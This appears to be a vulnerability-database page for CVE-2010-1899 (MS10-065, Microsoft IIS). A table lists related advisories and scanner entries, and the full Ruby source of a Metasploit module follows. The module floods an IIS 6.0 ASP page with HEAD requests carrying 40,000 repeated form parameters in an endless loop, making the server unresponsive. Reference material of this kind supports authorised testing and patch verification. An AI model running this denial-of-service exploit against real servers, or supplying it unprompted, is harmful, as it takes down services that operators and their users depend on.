| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| CVE-2010-1899 | 1 Oct 201000:00 | – | circl | |
| Microsoft IIS Repeated Parameter Request Denial of Service (MS10-065; CVE-2010-1899) | 14 Sep 201000:00 | – | checkpoint_advisories | |
| Microsoft IIS Directory Authentication Bypass (MS10-065; CVE-2010-1899; CVE-2010-2731) | 14 Sep 201000:00 | – | checkpoint_advisories | |
| CVE-2010-1899 | 15 Sep 201018:00 | – | cve | |
| CVE-2010-1899 | 15 Sep 201018:00 | – | cvelist | |
| Microsoft IIS 7.0 Vulnerabilities (uncredentialed) (PCI/DSS) | 3 Apr 201800:00 | – | nessus | |
| MS10-065: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code Execution (2267960) | 14 Sep 201000:00 | – | nessus | |
| MS10-065: Vulnerabilities in Microsoft Internet Information Services (IIS) could allow remote code execution | 18 Jul 201218:49 | – | mskb | |
| Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service | 24 Nov 201020:10 | – | metasploit | |
| CVE-2010-1899 | 15 Sep 201019:00 | – | nvd |
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service',
'Description' => %q{
The vulnerability allows remote unauthenticated attackers to force the IIS server
to become unresponsive until the IIS service is restarted manually by the administrator.
Required is that Active Server Pages are hosted by the IIS and that an ASP script reads
out a Post Form value.
},
'Author' =>
[
'Heyder Andrade <heyder[at]alligatorteam.org>',
'Leandro Oliveira <leadro[at]alligatorteam.org>'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2010-1899' ],
[ 'OSVDB', '67978'],
[ 'MSB', 'MS10-065'],
[ 'EDB', '15167' ]
],
'DisclosureDate' => '2010-09-14'))
register_options(
[
Opt::RPORT(80),
OptString.new('VHOST', [ false, 'The virtual host name to use in requests']),
OptString.new('URI', [ true, 'URI to request', '/page.asp' ])
])
end
def run
uri = datastore['URI']
print_status("Attacking http://#{datastore['VHOST'] || rhost}:#{rport}#{uri}")
begin
while(1)
begin
connect
payload = "C=A&" * 40000
length = payload.size
sploit = "HEAD #{uri} HTTP/1.1\r\n"
sploit << "Host: #{datastore['VHOST'] || rhost}\r\n"
sploit << "Connection:Close\r\n"
sploit << "Content-Type: application/x-www-form-urlencoded\r\n"
sploit << "Content-Length:#{length} \r\n\r\n"
sploit << payload
sock.put(sploit)
#print_status("DoS packet sent.")
disconnect
rescue Errno::ECONNRESET
next
end
end
rescue Errno::EPIPE
print_good("IIS should now be unavailable")
end
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation